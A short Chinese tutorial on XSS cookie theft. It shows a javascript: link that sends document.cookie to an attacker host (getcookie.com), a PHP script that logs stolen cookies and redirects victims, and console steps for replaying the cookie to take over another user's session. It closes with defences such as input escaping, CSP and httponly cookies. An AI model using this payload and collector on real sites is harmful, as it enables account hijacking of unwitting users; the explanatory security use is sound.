都说cookie不安全，现在通过一个很简单的例子来说明它为什么不安全。

对于cookie的概念这里就不做阐述了。前端截取cookie的方式有多种，下面介绍一种比较简单的手法。

首先：

小黑会在各种网站发布帖子，然后在某些特定的地方添加吸引人点击的内容，而该内容会有一些超链接。比如在A网站，小黑在发布的内容中加个超链接：

<a href=”JS_URL”  target=”_blank”>点击我，跳转到B网站</a>

然后JS_URL 用如下形式：

javascript:window.location.href='http://www.getcookie.com/info.php?usercookie='+document.cookie;

或者

javascript:window.open('http://www.getcookie.com/info.php?usercookie='+document.cookie);

然后：

小黑在自己的服务器上也就是www.getcookie.com 上写好脚本info.php，接收以上超链接传输过来的cookie。

Info.php

<?php

$info=$_GET[‘usercookie’];

if($info){

    file_put_contents('./cookie_log.txt', $info.PHP_EOL, FILE_APPEND);

}

header("Location:http://www.B.com");//因为超链接是要跳转到B网站，拿到cookie后再给他跳转，不容易被发现。

最后：

小黑拿到其他用户的cookie后，在A网站登录自己的账号，然后只需要将自己账号的cookie改成前面截取到的cookie。具体步骤：

进入F12的控制台，执行：document.cookie = 'PHPSESSID= aaaaaaaaaaaa;'; 有的网站有多个cookie，每个cookie会对应不同子域名，所有这种需要在设置cookie时加上有效的域名和目录等。比如：document.cookie = PHPSESSID =aaaaaaaaaaaa;'+ 'path=/;'+ 'domain=.A.com';  表示一级域名下有效。

如果没有A网站的账号，也可以直接设置cookie到该网站的域名下，不过这样可能花费的调试时间多些，因为有些网站有多个cookie，各个cookie对应的子域名、目录等可能不一样。如果自己有一个账号，只要登录后替换对应键的cookie值就可以了。

除了在控制台执行document.cookie，也可以Application项目的Cookies栏目下修改cookie值。

刷新一下，就能获得别人账号的权限了。

对于这种XSS攻击，有时真的是防不胜防，但也还得防。

防范方式：

1）字符的过滤，将用户输入的字符进行特殊字符过滤或转义，比如空格，单引号，双引号，尖括号等；

2）避免cookie中泄露用户隐私，也可以通过cookie和ip绑定来降低泄露风险。

3）提交表单尽量用POST而非GET

4）内容安全策略——CSP（Content-Security-Policy），一种以可信白名单作机制，来限制网站中是否可以包含某来源内容。默认配置下不允许执行内联代码

5）设置cookie为httponly。这样前端就无法通过document.cookie截取到该cookie值。比如php的设置方法：

方法一、在php.ini配置文件中进行cookie只读设置的开启 ：session.cookie_httponly = On

方法二、在php代码顶部设置
<?php
ini_set("session.cookie_httponly", 1);
//php5.1以前版本设置方法：header("Set-Cookie: hidden=value; httpOnly");
?>